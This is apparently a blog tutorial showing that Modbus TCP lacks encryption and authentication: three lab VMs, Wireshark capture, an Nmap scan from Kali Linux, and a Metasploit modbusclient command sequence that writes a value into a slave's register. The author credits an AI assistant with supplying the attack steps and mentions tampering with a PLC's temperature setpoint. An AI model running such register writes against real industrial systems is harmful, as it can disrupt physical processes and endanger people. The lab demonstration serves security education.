Warning: the purpose of this article is to demonstrate that communications using the Modbus TCP protocol are not secure and therefore, it is advisable to protect communications using other encrypted protocols. Otherwise, we would be putting the security of our systems at risk.
Continuing from the previous article, where we already saw that Modbus TCP is not encrypted and does not require authentication, we will now see how we can exploit those vulnerabilities to write to the registers.
Step 1: Architecture and Modbus Communication in Local Network
For this example, I have worked with 3 virtual machines (VM - Virtual machines):
The 3 machines will be on a local network, so make sure to ping between all of them and adjust the network adapters to assign each one its IP address.
Step 2: Configure Modbus Master and Slave.
Step 2.1: Configure the Slave
This step is similar to that of the previous post, that is, the Modbus slave will be exactly the same as it will run on its own server 127.0.0.1 Port 502.
Step 2.2: Configure the Master
However, the Modbus Master that will obtain data from the slave has to do so from outside the PC, so we need to tell it which IP on the local network our Slave is on. In my case, it is on IP 192.168.1.50 and we already know the port, 502.
We accept and check that there is communication when the red text "No connection" disappears.
Step 3: Wireshark - Exploring the Frames
In this case, we select the Ethernet0 network card
We filter again by "modbus" and select one of the frames, checking that we indeed read the same as the Poll.
Step 4: Port Scanning with Nmap and Kali-Linux
We already have our two machines communicating. It is time to monitor those communications and explore them to understand the communication.
- Target machine port scanning: we will perform a port scan from the Kali-Linux machine to our Modbus slave (192.168.1.50), which is our target machine.
We observe that it has several open ports, including 502 as we expected with the status "open" and name "mbap".
Step 5: Using Modbus Metasploits with AI Assistance
At this point, we are going to use metasploits, which are tools that exploit vulnerabilities found in different systems.
I am not an expert in the hacking world, but as always, AI is the best ally if you know what you want to do. In this case, it has been very helpful as it provided me with clear and simple steps to execute this attack.
In fact, I sent it an image of the port, told it that I have a Kali-Linux machine, and to use the existing metasploits to write to its registers, the response was spectacularly good and practical. The result, with some iterations, was this code:
sudo msfconsole
use auxiliary/scanner/scada/modbusclient
set RHOSTS 192.168.1.50
set RPORT 502
set UNIT_NUMBER 1
set DATA_ADDRESS 0
set DATA 12345
set ACTION WRITE_REGISTER
run
Run it one by one to see that it is doing it correctly:
Result: the specified value is perfectly written in the indicated register.
Conclusions
- Classic Modbus TCP is very vulnerable and it is very easy to infiltrate the communication and modify values.
- AI is a very powerful tool to help us detect these vulnerabilities and adequately defend ourselves.
Practical case: imagine you have a PLC that controls a device through Modbus communications, and it is writing a temperature reference. With the example seen today and exploiting the vulnerabilities of the Modbus TCP protocol, we could easily access through these metasploits from within the network and cause problems in the system.